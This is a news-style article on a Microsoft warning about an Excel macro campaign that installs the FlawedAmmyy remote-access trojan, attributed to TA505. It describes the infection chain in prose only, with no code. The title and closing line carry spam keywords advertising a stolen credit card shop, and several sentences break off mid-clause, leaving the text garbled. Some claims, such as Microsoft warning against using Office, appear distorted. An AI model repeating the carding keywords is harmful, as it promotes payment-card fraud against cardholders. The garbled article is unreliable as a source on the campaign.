Microsoft Warns Users Not to Enable Macros, or They Could Be Hit by Malware live cc shop, buy cc carding
Malware threats are becoming more and more of
an issue with each passing year. The threat seems to be evolving at a rapid
pace, with hackers constantly developing new, more advanced forms of malicious
software that spreads in any way it can find. The innovative ways of spreading
and infecting internet users are eventually being discovered, but the lack of
awareness may cause many to end up being infected, even if their devices are
According to Microsoft, there is currently a
new Windows malware that is spread via excel in email with bad macro. Because
of that, Microsoft warned users, urging them not to enable macros at all until
the new cybercampaign that relies on Office features is dealt with.
Considering the popularity of Microsoft Office applications around the world, it is clear why hackers focused their efforts on creating malware that could misuse these features for spreading. Unfortunately, some of the most favorite tools are now compromised and could infect mass amounts of Windows PCs, despite the fact that they could be fully patched and protected.
The only way for Microsoft to protect its
users was to raise awareness and warn them of the new threat, and so the
company warned against using Office. Earlier this month, the tech giant said
that attackers are firing spam that exploits a flaw in Office, which results in
the installation of a trojan. It was also discovered that the bug means that
attackers do not need users to enable macros in the first place.
But, according to the new information, there
is now a new malware campaign that takes the opposite approach and uses the
macro function in Excel to compromise devices. In other words, there is no
specific vulnerability that can be patched — it is exploiting a legitimate
feature in an Excel attachment.
As reported by the company’s Security
Intelligence team, this new campaign uses a complex infection chain in order to
download and run what is known as FlawedAmmyy. This is a remote-access trojan,
or RAT, which gets released directly into the infected PC’s memory. This is not
a new RAT, and it was used many times in the past, mostly against businesses in
the retail and finance industries.
According to Proofpoint, a well-known security
firm, it is likely that the hacking group responsible for the attack is TA505 . This is a group that often relies on
Microsoft attachments, as well as social engineering to infect the systems of
Experts also explained the attack, noting that
it starts with an email and Excel or .xls attachment. This is the kind of
attachment that Microsoft warns people not to open under any circumstances.
However, in cases where the attachment does get opened, the file will start
running a macro function which runs msiexec.exe, which will then download an
After that, the MSI archive extracts a digitally signed executable contained within, and runs it. This executable decrypts and runs another executable in the device’s memory. All of this allows malware to avoid detection, even if users have a fully-updated antivirus. But, that is not the end of the process either, as the malicious executable then downloads a file called wsus.exe, which is then decrypted.
This file is designed to look like Microsoft
Windows Service Update Service, or WSUS. The file then decrypts the payload in
RAM, and FlawedAmmyy payload is delivered.
So far, it appears that the attack is mostly targeting Korean-speakers, which was deduced due to the fact that attachment includes characters from Korean language. Meanwhile, Microsoft is investing in the infrastructure of its Windows Defender, hoping to improve the built-in antivirus and make it a better obstacle for malware.
Another security company, TrendMicro, recently
pointed out that TA505 appears to be targeting Windows users in a few specific
locations, including China, Taiwan, Chile, Mexico, and South Korea, which
confirms that the malware might only be meant for South Koreans at this time.
However, if TrendMicro is right, it is possible that Windows users in other
specified areas might start experiencing similar issues in the near future.
live cc shop buy cc carding